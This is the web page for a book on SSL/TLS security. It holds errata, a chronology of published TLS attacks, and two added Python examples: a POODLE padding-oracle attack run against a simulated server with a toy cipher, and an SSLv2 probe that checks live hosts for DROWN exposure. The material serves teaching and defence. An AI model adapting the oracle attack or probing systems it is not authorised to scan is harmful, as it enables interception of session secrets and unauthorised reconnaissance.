SSL and TLS: Theory and Practice, Second Edition
A book published by
Artech House Publishers in the Information
Security and Privacy Series
Rolf Oppliger, Ph.D.
eSECURITY Technologies Rolf Oppliger
Breichtenstrasse 18
CH-3074 Muri b. Bern, Switzerland
E-Mail: rolf.oppliger@esecurity.ch
Phone: +41 79 654 84 37
This book provides a comprehensive overview and discussion of the SSL/TLS and DTLS protocols, and specifically
addresses their security. This includes the most recent attacks against the SSL/TLS protocols that have made
press headlines (e.g., BEAST, CRIME, Lucky 13, POODLE, FREAK, Logjam, ... ). The book also addresses related
topics, like TLS extensions, firewall traversal, as well as public key certificates and Internet PKI.
The book is intended for anyone who has a basic understanding of cryptography and TCP/IP networking, and who
wants to learn more about the SSL/TLS and DTLS protocols and their proper use. It speaks to both theorists
and practitioners.
Preface
1. Introduction
2. SSL Protocol
3. TLS Protocol
4. DTLS Protocol
5. Firewall Traversal
6. Public Key Certificates and Internet PKI
7. Concluding Remarks
Registered TLS Cipher Suites
Padding Oracle Attacks
Abbreviations and Acronyms
About the Author
Index
- Page 23, Figure 2.1: The caption should start with "The SSL protocol with ..." (instead of
"The SSL protocol with ...")
- Page 36, Table 2.4: The key exchange algorithm associated with SSL_DH_anon_EXPORT_WITH_DES40_CBC_SHA
is "DH_anon_EXPORT" (instead of "DH_anon")
- Page 69, line 10 from the bottom: The note in brackets should read as "referring to a Finished message"
(instead of "referring to a CertificateVerify message")
- Page 83, line 2: Insert "minus one" after "... refer to the padding length"
- Page 85, line 8: The last term in the square brackets should read as C_{i-1}[k-1] (instead of
C_{n-1}[k-1])
- Page 166, lines 2 and 9 in paragraph 2: The overline of C should also comprise the Delta
- Page 167, line 8: "the" must be replaced with "then"
- Page 248, 9th line from the bottom: The note in brackets should read as "that has been encrypted
with e" (instead of d)
- Page 248, 8th line from the bottom: The note in brackets should read as "using the respective
private key d" (instead of "using the same key d")
- Page 250, 3rd line after Algorithm B.1: "interated" must be replaced with "iterated"
- In April 2022, the DTLS 1.3 specification was published in
RFC 9147 and submitted to the Internet
Standards Track.
- In March 2021, the IETF officially deprecated TLS version 1.0 and 1.1, as well as DTLS
version 1.0 in RFC 8996.
- In March/April 2019, Nir Drucker and Shay Gueron released a
paper in which they
identify a security vulnerability in the PSK feature of TLS 1.3 that can be exploited in
a new reflection attack called Selfie.
- After the release of the POODLE attack in 2014 (cf. Section 2.4), it was found that several
TLS implementations did not properly validate the padding bytes and were therefore also
susceptible to the POODLE attack - now called POODLE TLS. In March 2019, Craig Young found
and posted two related attacks: Zombie POODLE and
GOLDENDOODLE.
- In November 2018, Eyal Ronen et al. published a
paper in which they show
that most TLS implementations in use today are still vulnerable to Bleichenbacher-like padding
oracle attacks. The term coined to refer to these attacks is Cache-like ATtacks, and hence the
acronym used here is CAT (equal to the respective research
project name).
- At the 25th ACM Conference on Computer and Communications Security (CCS) that took place in October 2018, Eyal Ronen, Kenneth G. Paterson, and Adi Shamir
presented three new types of attack that are similar to Lucky 13 and that remain feasible even
though pseudo constant time countermeasures have been put in place. A preprint of the paper is available in the Cryptology ePrint Archive.
- In August 2018, the TLS 1.3 specification was published in
RFC 8446 and submitted to the Internet
Standards Track.
- In December 2017, Hanno Böck, Juraj Somorovsky, and Craig Young published a
paper in which they
showed that many currently deployed products and sites are still vulnerable to the Bleichenbacher
attack. The respective attack is called ROBOT, an acronym standing for Return Of Bleichenbacher's
Oracle Threat.
- At the 23rd ACM Conference on Computer and Communications Security (CCS) that took place in October 2016, Karthikeyan
Bhargavan and Gaëtan Leurent presented a new attack - called Sweet32 - that exploits collisions on block ciphers with a relatively short block length,
such as 3DES used in HTTPS.
- At BlackHat 2016, Mathy Vanhoef and Tom Van Goethem demonstrated possibilities to mount compression-related attacks,
such as CRIME or BREACH, entirely in a modern browser that supports a specific API, i.e., the ServiceWorkers API,
without any network sniffing or MITM deployment. The respective attack has been named HTTP Encrypted Information
can be Stolen through TCP-Windows
(HEIST).
- On May 25, 2016, Radu Caragea published a
paper in which he described forensic techniques to read out a server's master key from the memory of a
virtual machine executed in a hypervisor. This work has an impact on the security that can be achieved if the operation
of an SSL/TLS-enabled Web server is outsourced, for example, to an external cloud provider.
- On May 3, 2016, Juraj Somorovsky announced a vulnerability in OpenSSL (CVE-2016-2107) that was introduced to fix Lucky
13, and that can be exploited in a new padding oracle attack. Filippo Valsorda later coined the term
LuckyMinus20 (or LuckyNegative20) to refer to it.
- On March 1, 2016, a group of researchers announced a new attack against (all versions of) the TLS protocol.
The attack is called DROWN, an acronym standing for
Decrypting RSA with Obsolete and Weakened eNcryption. It is basically a cross-protocol attack that exploits the fact
that the usual countermeasure against the Bleichenbacher attack (cf. Section 2.4 on top of page 81) does
not work properly in an SSLv2 setting (due to the way the master secret is generated, combined with the fact that
this secret can be as small as 40 bits in exportable cipher suites). So if a server supports SSLv2 and uses
the same RSA key for TLS, then the DROWN attack can be used to mount a variation of the
Bleichenbacher attack. There are two versions of the attack: a general DROWN attack and a special DROWN attack.
While the general DROWN attack is not particularly efficient, the special DROWN attack is highly efficient and
devastating. To defeat the attack, it is necessary to remove support for SSLv2 entirely on the server side, and
this applies to every server (including unrelated services, such as a mail server) that shares its RSA key with a TLS server.
- At the 2016 Internet Society's Network and Distributed System Security Symposium
(NDSS 2016), Karthikeyan Bhargavan
and Gaëtan Leurent presented some transcript collision attacks against cryptographic hash functions that
are known to have weaknesses regarding their collision resistance (e.g., MD5 and SHA-1) but are still used
in TLS (as well as many other Internet security protocols, such as IKE and SSH). The attacks are collectively called
SLOTH, an acronym standing for Security
Loss due to the use of Obsolete and Truncated Hash constructions.
- In November 2015, Martin R. Albrecht and Kenneth G. Paterson released a technical report in which they explain how a variant of the Lucky 13 attack - named Lucky Microseconds - can still be
mounted against Amazon's new implementation of the TLS protocol (i.e., s2n) even though protections against Lucky 13 had been
put in place.
- In August 2015 (24th USENIX Security Symposium), two research groups presented papers on how to actually
break RC4 in a TLS setting (paper1,
paper2). The results of the second paper
are also known as the RC4 NOMORE attack.
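The padding check that the POODLE TLS item above (and the erratum for page 83) turns on, as an added example that is not part of the book or this page: a Python simulation of a CBC record layer with a lax, SSL 3.0-style padding check beside the strict TLS check, and the POODLE block-copy oracle run against both. The block cipher is a 4-round HMAC-based Feistel toy standing in for AES, the keys, the 16-byte SECRET cookie and the request layout are constructed for the demonstration, and the checks are written for readability rather than in constant time (timing leaks are the separate Lucky 13 concern). The byte recovered per accepted record is P_i[k-1] = C_{i-1}[k-1] XOR C_{n-1}[k-1] XOR (k-1), the relation the erratum for page 85 refers to.

```python
import hashlib, hmac, os

BLOCK = 16                      # block size of the toy cipher (same as AES)
MAC_LEN = 32                    # HMAC-SHA256 tag, as in a *_CBC_SHA256 suite
SECRET = b"session=c0ffee42"    # constructed 16-byte cookie the attacker is after

def _xor(x, y):
    return bytes(a ^ b for a, b in zip(x, y))

def _f(key, half, rnd):
    # Feistel round function: a keyed PRF truncated to half a block.
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:BLOCK // 2]

def block_encrypt(key, b):
    # 4-round Feistel network standing in for AES; NOT a secure cipher.
    l, r = b[:BLOCK // 2], b[BLOCK // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def block_decrypt(key, b):
    l, r = b[:BLOCK // 2], b[BLOCK // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def build_record(key, mac_key, data):
    # MAC-then-pad-then-encrypt as in SSL 3.0 / TLS 1.x CBC suites: each of the
    # padlen+1 trailing bytes holds padlen, i.e. the padding length minus one.
    plain = data + hmac.new(mac_key, data, hashlib.sha256).digest()
    padlen = BLOCK - 1 - len(plain) % BLOCK
    plain += bytes([padlen]) * (padlen + 1)
    iv = os.urandom(BLOCK)      # explicit per-record IV (TLS 1.1+ style)
    return iv + cbc_encrypt(key, iv, plain)

def strip_padding_lax(plain):
    # SSL 3.0 rule, also found in the POODLE-TLS-affected stacks: only the
    # length byte is inspected, the padding bytes themselves are never checked.
    padlen = plain[-1]
    if padlen + 1 > BLOCK or padlen + 1 + MAC_LEN > len(plain):
        return None
    return plain[:-(padlen + 1)]

def strip_padding_strict(plain):
    # TLS rule: all padlen+1 trailing bytes must equal padlen. (A deployable
    # implementation must also do this in constant time, cf. Lucky 13.)
    padlen = plain[-1]
    if padlen + 1 + MAC_LEN > len(plain) or any(b != padlen for b in plain[-(padlen + 1):]):
        return None
    return plain[:-(padlen + 1)]

def server_accepts(key, mac_key, record, strip):
    # Decrypt, strip padding with the given rule, then verify the MAC.
    iv, ct = record[:BLOCK], record[BLOCK:]
    if len(ct) < BLOCK or len(ct) % BLOCK:
        return False
    body = strip(cbc_decrypt(key, iv, ct))
    if body is None or len(body) < MAC_LEN:
        return False
    data, tag = body[:-MAC_LEN], body[-MAC_LEN:]
    return hmac.compare_digest(tag, hmac.new(mac_key, data, hashlib.sha256).digest())

def poodle_recover(oracle, client, secret_len, max_trials=20000):
    # POODLE: choose the request prefix so that SECRET[j] sits at the last byte
    # of block 0, then copy C_0 over the all-padding last block. The server
    # accepts iff D(C_0)[15] ^ C_{n-1}[15] == 15, which reveals
    # P_0[15] = C_{-1}[15] ^ C_{n-1}[15] ^ 15, with C_{-1} being the IV.
    out = bytearray()
    for j in range(secret_len):
        shift = (BLOCK - 1 - j) % BLOCK
        for _ in range(max_trials):
            rec = client(shift)
            iv, ct = rec[:BLOCK], rec[BLOCK:]
            forged = iv + ct[:-BLOCK] + ct[:BLOCK]
            if oracle(forged):
                out.append(iv[-1] ^ ct[-BLOCK - 1] ^ (BLOCK - 1))
                break
        else:
            return None     # never accepted: the padding bytes are being checked
    return bytes(out)

def demo(strip=strip_padding_lax, secret_len=len(SECRET), max_trials=20000):
    # Constructed victim: fresh keys, a browser that repeats the request with an
    # attacker-chosen prefix length, and a server using the given padding rule.
    key, mac_key = os.urandom(16), os.urandom(32)

    def client(shift):
        return build_record(key, mac_key, b"G" * shift + SECRET + b"X" * ((-shift) % BLOCK))

    return poodle_recover(lambda rec: server_accepts(key, mac_key, rec, strip),
                          client, secret_len, max_trials)

if __name__ == "__main__":
    print(demo())                                 # b'session=c0ffee42'
    print(demo(strip_padding_strict, 1, 3000))    # None
```

Against the lax check the attacker recovers the cookie with about 256 requests per byte; against the strict check the copied block would have to decrypt to sixteen bytes of 0x0F, so it is never accepted and `poodle_recover` gives up and returns None.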
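A check for the precondition of DROWN described above, as an added example that is neither from the book nor the DROWN authors' scanner: a Python probe that sends an SSLv2 CLIENT-HELLO and parses the SERVER-HELLO, because a server that answers one still speaks SSLv2 and, if it shares its RSA key with a TLS server, exposes that key to the attack. The cipher kind values are the ones from the SSL 2.0 draft; `sample_server_hello` is a constructed response with dummy certificate bytes so the parser can be exercised offline, and `probe` is the only part that touches the network.

```python
import os
import socket
import struct

# SSLv2 cipher kinds (3-byte CIPHER-KIND values from the SSL 2.0 draft).
SSLV2_CIPHER_KINDS = {
    b"\x01\x00\x80": "SSL_CK_RC4_128_WITH_MD5",
    b"\x02\x00\x80": "SSL_CK_RC4_128_EXPORT40_WITH_MD5",
    b"\x03\x00\x80": "SSL_CK_RC2_128_CBC_WITH_MD5",
    b"\x04\x00\x80": "SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5",
    b"\x05\x00\x80": "SSL_CK_IDEA_128_CBC_WITH_MD5",
    b"\x06\x00\x40": "SSL_CK_DES_64_CBC_WITH_MD5",
    b"\x07\x00\xc0": "SSL_CK_DES_192_EDE3_CBC_WITH_MD5",
}

def _record(body):
    # Two-byte SSLv2 record header: high bit set, 15-bit length, no padding.
    return struct.pack(">H", 0x8000 | len(body)) + body

def build_client_hello(challenge=None):
    # CLIENT-HELLO (type 1) for version 0x0002 offering every SSLv2 cipher kind,
    # with an empty session id and a 16-byte random challenge.
    challenge = os.urandom(16) if challenge is None else challenge
    kinds = b"".join(SSLV2_CIPHER_KINDS)
    body = b"\x01\x00\x02" + struct.pack(">HHH", len(kinds), 0, len(challenge)) + kinds + challenge
    return _record(body)

def parse_server_hello(data):
    # Returns the fields of an SSLv2 SERVER-HELLO (type 4) or raises ValueError
    # if the bytes are anything else (a TLS alert, an HTTP banner, nothing ...).
    if len(data) < 2 or not data[0] & 0x80:
        raise ValueError("not a two-byte SSLv2 record header")
    length = struct.unpack(">H", data[:2])[0] & 0x7FFF
    body = data[2:2 + length]
    if len(body) != length or len(body) < 11 or body[0] != 0x04:
        raise ValueError("not a complete SSLv2 SERVER-HELLO")
    _hit, _cert_type, version, cert_len, kinds_len, conn_len = struct.unpack(">BBHHHH", body[1:11])
    if 11 + cert_len + kinds_len + conn_len != len(body):
        raise ValueError("SERVER-HELLO length fields do not add up")
    kinds = body[11 + cert_len:11 + cert_len + kinds_len]
    names = [SSLV2_CIPHER_KINDS.get(kinds[i:i + 3], kinds[i:i + 3].hex()) for i in range(0, len(kinds), 3)]
    return {"version": version, "certificate_len": cert_len, "ciphers": names,
            "export_ciphers": [n for n in names if "EXPORT" in n]}

def is_sslv2_server_hello(data):
    try:
        parse_server_hello(data)
        return True
    except ValueError:
        return False

def sample_server_hello():
    # Constructed SERVER-HELLO for offline use: dummy certificate bytes, three
    # cipher kinds (one of them a 40-bit export kind), 16-byte connection id.
    cert, conn = b"\x30\x03\x02\x01\x01", b"\x11" * 16
    kinds = b"\x01\x00\x80\x02\x00\x80\x07\x00\xc0"
    body = b"\x04\x00\x01\x00\x02" + struct.pack(">HHH", len(cert), len(kinds), len(conn)) + cert + kinds + conn
    return _record(body)

def probe(host, port=443, timeout=5.0):
    # Live check (needs the network): send a CLIENT-HELLO and return the parsed
    # SERVER-HELLO if the peer still speaks SSLv2, else None.
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello())
        data = s.recv(4096)
        if len(data) >= 2 and data[0] & 0x80:
            need = 2 + (struct.unpack(">H", data[:2])[0] & 0x7FFF)
            while len(data) < need:
                chunk = s.recv(4096)
                if not chunk:
                    break
                data += chunk
    return parse_server_hello(data) if is_sslv2_server_hello(data) else None

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 443))
    else:
        print(parse_server_hello(sample_server_hello()))
```

Any SERVER-HELLO at all is the finding; the server must be probed on every port and host that presents the same RSA key (IMAP, SMTP and the like included), since DROWN only needs one SSLv2 endpoint with that key. A TLS-only server typically answers with a TLS alert or closes the connection, both of which `parse_server_hello` rejects.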
- On June 24, 2021, Rolf Oppliger gave a Webinar for the Information Security Society Switzerland (ISSS) on TLS 1.3 (the
slides are available here).
- David Wong has created an animated TLS 1.3 specification that is more readable and accessible than the purely
text-based RFC 8446.
- An interactive illustration of a TLS 1.3 protocol execution transcript is
available here (a similar
illustration for TLS 1.2 is available here).
- A TLS 1.3 protocol execution transcript has been captured with Wireshark
(TLS13Handshake.pcapng).
- A TLS 1.2 protocol execution transcript has been captured with Wireshark
(TLS12Handshake.pcapng) and is discussed in a new Appendix C that will be included in the next edition of the book.
- Ivan Ristić has compiled a Web page
that provides a comprehensive history of the most important events that shaped the SSL/TLS and PKI ecosystem.
© 2022 Rolf Oppliger